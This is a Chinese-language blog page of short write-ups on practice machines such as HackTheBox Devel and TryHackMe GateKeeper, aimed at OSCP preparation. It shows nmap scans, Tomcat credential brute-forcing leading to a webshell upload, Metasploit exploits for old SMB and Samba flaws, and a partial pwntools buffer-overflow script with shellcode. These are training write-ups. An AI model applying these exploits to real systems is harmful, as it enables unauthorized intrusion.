Wenyi Li

嘖嘖嘖...試著用cherrytree寫writeup，超煩。 還是比較喜歡hackmd 這台的思路跟我去年打下第一台現實世界的伺服器是差不多的。 提權的部分學到新招:metasploit local exploit suggester! 雖然目前一直用metasploit打起來很爽，但之後考OSCP禁用。 HackTheBox Devel writeup - HackMD HackTheBox Devel writeup HackTheBox Devel writeup Port Scan ┌──(kali㉿kali)-[~/Devel] └─$ nmap 10.10.10.5 -T4 -A -o nmao.txt Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-18 23:02 EST Nmap scan report for 10.10.10.5 Host is up (0.27s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM <DIR> aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |_03-17-17 04:37PM 184946 welcome.png 80/tcp open http

TryHackMe GateKeeper - HackMD 其實這篇去年6/28寫的，想說從hackmd移到blogger TryHackMe GateKeeper 這間主要練OSCP會出現的 windows bufferoverflow。提權部分就沒打了 情蒐 port scan 檢查服務 發現port 135,139,31337是開的。 port 31337 跑的就是我們要pwn的程式。 smbclient連過去挖一下，找到 gatekeeper.exe，把它載下來，移到windows平台測試 fuzzing：想辦法讓程式掛掉 將 gatekeeper.exe 丟進Immunity Debugger後，自己寫腳本fuzz。 finding badchars with mona !mona ba 用pwntools送bytearray 最後 exploit from pwn import * RHOST = "10.10.101.108" r = remote(RHOST, 31337 ) shellcode = ( b"\xbb\xc1\x54\x15\x16\xdb\xdb\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" b"\x52\x31\x5a\x12\x03\x5a\x12\x83\x2b\xa8\xf7\xe3\x57\xb9\x7a" b"\x0b\xa7\x3a\x1b\x85\x42\x0b\x1b\xf1\x07\x3c\xab\x71\x45\xb1" b"\x40\xd7\x7d\x42\x24\xf0\x72\xe3\x83\x26\xbd\xf4\xb8\x1b\xdc" b"\x76\xc3\x4f\x3e\x46\x0c\x82\x3f\x8f\x71\x6f\x6d\x58

又是台windows靶機，這次是打 Apache tomcat nmap 照慣例用nmap掃，發現只開一個8080 port 如果沒找到東西還會再掃所有port  目錄爆破 拿dirb掃，然後沒有找到任何有用的東西 Research and Enumeration 知道這台機器跑 Apache Tomcat 7.0.88 跟 Apache Coyote 1.1 上網查有沒有公開漏洞 Exploit DB 沒找到什麼可以用的RCE 但看了一下hacktricks ( https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat ) 發現有辦法登入Tomcat 的管理介面，就能透過上傳WAR檔放個webshell 管理者帳密爆破 tomcat 使用HTTP basic auth 有個metasploit模組可以用來爆破: 讓它跑一下，就成功猜到帳密了 RCE 登入管理介面後，就能傳webshell達成RCE。 這邊我懶一點，繼續用 metasploit 然後就拿到shell了~  開 shell 馬上就是最高權限 

 第2台靶機。這台是Windows。 先nmap 發現135,139,445開著，用 -A做完整掃描(包括version detection, script scan等等) 吐一堆資訊出來，我們知道它是Windows XP,可能SP2或SP3。 根據這些資訊查公開漏洞。馬上找到一個:CVE-2008-4250 這是個針對smb的bufferoverflow，算蠻穩的exploit。 使用對應的metasploit模組: 設定參數並執行，然後就開shell了 我們還是系統最高權限。 Takeaway:之後檢查smb可以用這nmap script: nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <IP Address>

 開始根據TJ null's OSCP list 刷靶機。 這是第1台。希望能堅持把它刷完。 先 nmap 檢查它開什麼服務 加 -sC 做script scan 原本以為ftp有洞；vsFTPd 2.3.4有個 RCE ( CVE-2011-2523 )，但 exploit 跑完沒反應。 仔細看看smb: Samba 3.0.20 查一下看到有 CVE ( CVE-2007-2447 ) 跟 metasploit 模組 直接拿來用: 然後就拿到root shell了。